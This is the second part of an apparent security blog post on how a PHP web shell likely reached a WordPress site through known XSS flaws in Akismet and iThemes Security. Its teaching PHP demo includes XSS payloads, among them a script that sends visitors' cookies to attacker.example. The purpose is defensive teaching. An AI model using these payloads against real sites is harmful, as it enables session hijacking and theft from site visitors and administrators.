This is the second part of our exploration of MulCiShell Backdoor and File Uploader, a malicious PHP web shell that was detected on a customer’s website using CodeGuard’s MalwareGone tool. If you haven’t already, take a look at Part I before continuing. In this post, we’ll wrap things up by discussing the vulnerabilities that were found on this site, which may have allowed the MulCiShell Backdoor and File Uploader to be inserted. To pick up where we left off, here is the list of WordPress plugins installed on the hijacked site:
A search on the WPScan Vulnerability Database reveals a number of public vulnerabilities for some of these plugins. Here are a few examples:
1. WordPress Plugin: Akismet
   Version installed: 3.0.4
   Vulnerability: Unauthenticated Stored Cross-Site Scripting (XSS)
   Versions affected: 2.5.0 – 3.1.4 (the installed 3.0.4 falls inside this range)
2. WordPress Plugin: iThemes Security (formerly Better WP Security)
   Version installed: 5.6.1
   Vulnerability: Unauthenticated Stored Cross-Site Scripting (XSS)
   Versions affected: <= 5.6.1 (the installed version is the last affected release)
Both of these vulnerabilities are Cross-Site Scripting, aka XSS, and both are exploitable without logging in. But do you know what XSS is? According to the Open Web Application Security Project (OWASP):
XSS flaws occur whenever an application takes untrusted data and sends it to a web browser without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.
XSS is usually divided into three types:
- Stored or Persistent – the malicious code is saved on the server (typically in the site’s database, e.g. as a comment or a plugin setting) and is served to every visitor who later views the affected page; the attacker submits it once and waits.
- Reflected – the malicious code arrives in the victim’s own request (for example a URL parameter) and is echoed back in the response, so the victim has to be lured into clicking a crafted link.
- DOM-based – the vulnerability is in client-side code: the page’s own JavaScript writes attacker-controlled data (for example from the URL fragment) into the browser’s Document Object Model without sanitising it, so the payload may never reach the server at all.
[Figure: Persistent XSS example – Source: http://excess-xss.com/]
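To make the stored and reflected cases concrete, here is an added example (written for this post, not code from the original article or from either of the plugins named above) showing the vulnerable pattern behind such advisories beside its hardened form. The comment rows and the request array are constructed stand-ins for a database table and `$_GET`, so the script runs from the command line; in a WordPress plugin the escaping wrapper below would be replaced by the core helpers `esc_html()` for text nodes and `esc_attr()` for attribute values.

```php
<?php
// Added example: stored and reflected XSS in PHP, vulnerable vs. hardened.
// Run with: php xss_demo.php

// Constructed "database" rows. The first comment is benign. The second was
// submitted by an attacker: the author name breaks out of a double-quoted
// attribute, the body injects a script tag. Submitting it is the attacker's
// only step; the payload fires later, whenever anyone (including the site
// administrator) views the page that renders the comments.
$comments = [
    ['author' => 'alice', 'body' => 'Great post, thanks!'],
    ['author' => '" onmouseover="alert(document.cookie)',
     'body'   => '<script>new Image().src="https://attacker.example/?c="+document.cookie</script>'],
];

/** Vulnerable: untrusted data is concatenated straight into the HTML. */
function render_comment_vulnerable(array $c): string
{
    return '<div class="comment" data-author="' . $c['author'] . '">'
         . '<b>' . $c['author'] . '</b>: ' . $c['body'] . '</div>';
}

/**
 * Escape a string for an HTML text node or a double-quoted attribute value.
 * ENT_QUOTES also escapes single quotes, which matters inside attributes.
 */
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

/** Hardened: every untrusted value is escaped at the point of output. */
function render_comment_hardened(array $c): string
{
    return '<div class="comment" data-author="' . e($c['author']) . '">'
         . '<b>' . e($c['author']) . '</b>: ' . e($c['body']) . '</div>';
}

/** Reflected variant: the payload arrives in the request, not the database. */
function search_page_vulnerable(array $get): string
{
    $q = $get['q'] ?? '';
    return '<p>Results for: ' . $q . '</p>';
}

function search_page_hardened(array $get): string
{
    $q = $get['q'] ?? '';
    return '<p>Results for: ' . e($q) . '</p>';
}

echo "--- stored, vulnerable (script tag survives intact) ---\n";
foreach ($comments as $c) {
    echo render_comment_vulnerable($c), "\n";
}

echo "--- stored, hardened (payload becomes inert text) ---\n";
foreach ($comments as $c) {
    echo render_comment_hardened($c), "\n";
}

// Constructed request; in a real handler this would be $_GET.
$request = ['q' => '<img src=x onerror=alert(1)>'];
echo "--- reflected ---\n";
echo search_page_vulnerable($request), "\n";
echo search_page_hardened($request), "\n";
```

The point to take away is that the rows are stored exactly as submitted in both versions; the fix is escaping on the way out, for the context the value lands in (text node, attribute, URL, JavaScript string), not filtering on the way in. Input validation is still worth doing, but a stored value can reach the page through many paths, and only output escaping covers all of them.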
With this kind of vulnerability, attackers can execute scripts in a victim’s browser to hijack user sessions, deface web sites, insert malicious content, redirect users to malicious sites, and so on. We believe that the attacker was able to exploit one of these vulnerabilities to inject code on the client’s site and, with that, to upload the malicious files we saw in the first part of this post. One caveat is worth spelling out: XSS by itself does not write files to the server. What makes a stored XSS dangerous on a WordPress site is that the payload eventually executes in an administrator’s browser, and from there it can perform any action that administrator can, such as saving a file through the built-in theme or plugin editor, which is exactly the kind of step that plants a web shell. Keeping plugins updated closes the entry point, and setting `define('DISALLOW_FILE_EDIT', true);` in wp-config.php removes the in-browser file editors that such a hijacked session would most likely abuse. This is why it’s important as website owners to keep all of your systems updated and, of course, to have a backup strategy like CodeGuard in place just in case things do go wrong.
If you have any questions or comments don’t hesitate to send them to us! See you next time!
OWASP Foundation – https://www.owasp.org/
OWASP Appsec Tutorial Series – Episode 3: Cross Site Scripting (XSS) – https://www.youtube.com/watch?v=_Z9RQSnf8-g
XSS vulnerability in iThemes Security (formerly Better WP Security) 5.6.1 –